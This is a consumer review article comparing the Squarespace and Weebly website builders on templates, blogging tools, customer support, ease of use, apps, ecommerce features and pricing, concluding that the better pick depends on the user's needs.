Setting up a website for your business, blog, or personal portfolio can open up a ton of doors for you, both professionally and personally. When done properly, it can get your skills, talents, and goods in front of the eyes of those who need to see them most. That’s awesome! But it’s also a lot of pressure to hang on your website, and that can make things a little stressful (to say the least) when it comes to picking the perfect website builder for your needs.

While it can be tough to pick from the wide array of site builders out there, you’re already off to a great start by landing here, since Squarespace and Weebly are two of the best website builders to ever do it. However, where Squarespace is a bit more stylish and — dare we say — flashy, Weebly is a bit more understated, despite what its somewhat cutesy name might suggest. They’re quite similar overall, but they do differ in key ways that may make one more suited to your style or your particular website needs, whether it’s for drumming up interest in your small business, showcasing a portfolio or other creative freelance skill, or getting your thoughts and blogs out to a wider audience.

They’re quite similar overall, but they do differ in key ways that may make one more suited to your style or website needs.

But before we dig into how they differ, let’s take a look at how much Squarespace and Weebly actually have in common:

  • Both provide their own easy-to-use website builder to make site customization seamless and easy, even for beginners with zero background in coding.

  • Both allow users to create websites that look great on mobile devices without any additional tweaking, and both provide incredible design flexibility, allowing users to change their templates at any time without losing information or having to rebuild from scratch. (Two key things we unfortunately cannot say about these platforms’ main competitor, Wix.)

  • Both also offer great blogging tools by default, as well as great ecommerce features to cater to all types of websites.

  • Squarespace and Weebly are on par with each other in terms of similar search engine optimization (SEO) tools to help land your site higher in search results, including easy editing of page title, description, and URL, as well as easy-to-understand guides to walk you through all the SEO stuff you need to know.

  • Both website builders allow you to easily link a custom domain from a third-party provider to your site. Otherwise, you can purchase your domain directly from Squarespace or Weebly, and both will give you your first year for free.

Point is, either one will get you set up with an attractive, professional-looking, and well-functioning website. However, each site builder differs in some key ways, so let’s dig into the race of Squarespace versus Weebly to see where one or the other pulls ahead depending on your individual needs or preferences.

Where Squarespace wins: Stunning visuals, better blogs, and stellar support

This should come as no surprise, as the website builder is probably most known for its aesthetic appeal, but at the visual level, Squarespace certainly takes the cake. There are more than a hundred designer Squarespace templates from which you can choose, each one sleeker and more stylish than the last. (But if you’re overwhelmed by the choice, you can use filters to narrow your search, or just look to our selection of the best Squarespace templates for some guidance.) This wealth of options makes the builder a really great choice for a stunning site with a modern, impressive design that feels really professional, but not in a stuffy way. If you’re seeking a certain aesthetic for your creative photography or video portfolio or eye-catching blog, Squarespace is the one for you.

An example of a blog template by Squarespace.

An example of a blog template by Squarespace.

Image: squarespace

Speaking of blogs, Squarespace also comes out slightly on top in this realm as they offer more abundant and thoughtful blogging features, and a ton of great blog templates. Their AMP support helps sites load quickly on mobile devices, so your visitors can enjoy your content wherever they view it. You can also set up your blog to allow posts from multiple authors, which makes for great collaborative opportunities that you won’t find with Weebly. You also have the ability to insert podcasts into blog posts for even greater multimedia integration for your visitors to enjoy.

When it comes to helping their customers out, Squarespace boasts some pretty fantastic (and free!) customer support via both email and chat. They also have a great FAQ section and community forum, as well as workshops and webinars. Basically, they provide tons of different ways to learn how to make Squarespace work best for you. The only thing they don’t have is phone support, but we wouldn’t necessarily consider that a huge loss given all the other options.

Where Squarespace falls short: Potentially overwhelming interface and no free plan

Though it brings about some truly stylish results, Squarespace’s drag-and-drop interface isn’t super intuitive, so beginners may find themselves navigating a bit of a learning curve. This isn’t to say that it’s difficult to use or learn; it’s just that its minimalist design seems deceptively simple at first glance. Then you’ll come to find that just about every click presents you with a wealth of additional options, which can feel a little overwhelming straight out of the gate. However, as mentioned above, there are tons of tutorials out there, both from Squarespace and other users. It’s just a little unfortunate that the builder isn’t instantly intuitive in the way that Weebly is.

On the flip side, all of these customization options — from font styles and colors to visual spacing — are great for those users who want that type of flexibility. That said, it’s also incredibly easy to get carried away and tweak yourself into oblivion, resulting in a less visually appealing site, or one that no longer looks nice on mobile devices. Because of all these options, it’s important to strike the right balance when building your Squarespace site.

Along the same lines as customization, Squarespace does allow users to dig into CSS coding, but you’ll have to pay for a more expensive ecommerce plan to do so. And, speaking of price, there’s no free plan option here and monthly rates ranging from $12 to $40 are about twice the price of Weebly.

Squarespace has a good selection of third-party extensions, but they’re mostly for ecommerce.

Squarespace has a good selection of third-party extensions, but they’re mostly for ecommerce.

Image: squarespace

Another downside to Squarespace is that they have a very limited app selection overall, and it’s kind of disappointing that they’re all from third-party developers. The Squarespace Extensions marketplace offers a few add-ons that are built in-house, but they’re mainly centered around ecommerce features.

And, lastly, a small, but common complaint in the SEO department is that Squarespace’s Alt-text is confusingly called “file name.” This is the space where you’ll want to describe your pictures in words, so it’s not really the file name, but alas, that’s what Squarespace calls it.

Where Weebly wins: Ease of use, coding control, and a free plan

When it comes to ease of use, Weebly is the clear winner thanks to its incredibly intuitive interface that is quite possibly the easiest website builder in the game. Not that Squarespace is necessarily difficult, but it certainly has more nuances when placed in direct comparison with Weebly. All you need to do to make your site is select elements from the builder’s sidebar and drop them where you want. Done and done. It’s a very straightforward process that ensures you can’t really go overboard with tweaks and edits, which makes it the perfect choice for beginners. However, all Weebly templates also feature an Advanced Theme Editor, so you do have the option to dig into the coding if you have some knowledge and desire to do so. Weebly offers full HTML and CSS control, unlike Squarespace, but you’ll want to be equally aware of making too many changes so as not to mess with the site’s mobile responsiveness. And, if you want your site to also have a blog, Weebly makes it super easy to edit it in the same style as your regular site pages for a cohesive and stylish visitor experience.

Weebly’s optional code editor allows users to customize themes.

Weebly’s optional code editor allows users to customize themes.

Image: weebly

Another win for Weebly is its offering of hundreds of high-quality apps that can be installed easily with just one click. Plus, many of them are built in-house so you can trust that they will always integrate seamlessly. These include, but are not limited to apps that’ll make your site more social, like live chat and polls; additions to boost your sales, like email campaigns and customer reviews; and other options to drive more traffic to your site. A good amount of the apps are free to use with your site, but some are premium and require an additional fee.

If you’re running an ecommerce site with Weebly, you’ll also be pleased to find that they have an automatic tax calculator for online shops in the United States. This is something you won’t find with any Squarespace plan, not even the top-tier Advanced Commerce option. Weebly also integrates a few more payment options, like Authorize.net and Square, in addition to Stripe and PayPal (which are the only two options on Squarespace). For these benefits, Weebly is a great choice for those who’ll be using their website to set up shop with a small- to medium-sized ecommerce business.

Best of all, Weebly offers a free plan so you can get your site up and running without any worries, and their paid plans are quite affordable, ranging from as low as $6 to $26 per month.

Where Weebly falls short: Fewer templates and less helpful user guides

With roughly half the number of templates — or themes — as Squarespace, you may feel a little limited by Weebly’s out-of-the-box designs. They are attractive and high-quality, for sure, though they may not be quite as visually impressive as Squarespace’s offerings. However, they are organized into easy-to-browse categories based on use, like those best-suited for an online store, portfolio, event, or blog.

Weebly’s templates are as attractive as Squarespace’s, but there just aren’t as many of them.

Weebly’s templates are as attractive as Squarespace’s, but there just aren’t as many of them.

Image: weebly

Speaking of blogs, that brings us to what may be another pain point for some. You can only have one author for your blog, so Weebly is not ideal for collaborative efforts in that regard.

Some may also consider Weebly’s customer service to be the “loser” in this direct Squarespace comparison. However, don’t get us wrong: Weebly’s customer support offerings are great. You can get in touch with them for free via email, chat, and, unlike Squarespace, phone support. They also have a great FAQ section and community forum. However, their Help Center guides do leave a bit to be desired, at least in comparison to Squarespace’s abundance of support offerings. (Then again, using Weebly is a lot more straightforward, so it doesn’t necessarily require such detailed guides.)

And finally, we may be nitpicking just a little bit here, but Weebly requires an extra plugin to use headers, like H2, H3, etc. Utilizing these properly can help out your SEO efforts, so not having them readily available for use is a little annoying, though not the end of the world.

The final word on Squarespace vs. Weebly

So who wins? Well, it’s kind of a toss-up. Both Squarespace and Weebly excel in helping users create incredibly attractive, yet still very functional sites in relatively easy ways, though Weebly is more suitable for true beginners. Though users do not need any coding knowledge to tweak their sites when website building, both offer tools to help dig into customization and really make the site feel more personal. Weebly gets the slight edge in this sense, as well, due to its code editor being accessible to all, but not required for site customization. And while Squarespace has the better blogging tools, Weebly gets the win for ecommerce sites.

On the one hand, Squarespace is particularly excellent for those in creative fields who are seeking a certain visual aesthetic that will really impress their visitors. It’s also the better choice for bloggers. On the other hand, Weebly is a fantastic choice for those who need something simple and free, as well as those who are setting up an online shop. So when it comes to a winner, it really depends on what you need, who you want your website to cater to, and what you’re willing to spend. Either way, you’ll make a great choice with either Squarespace or Weebly as your website builder.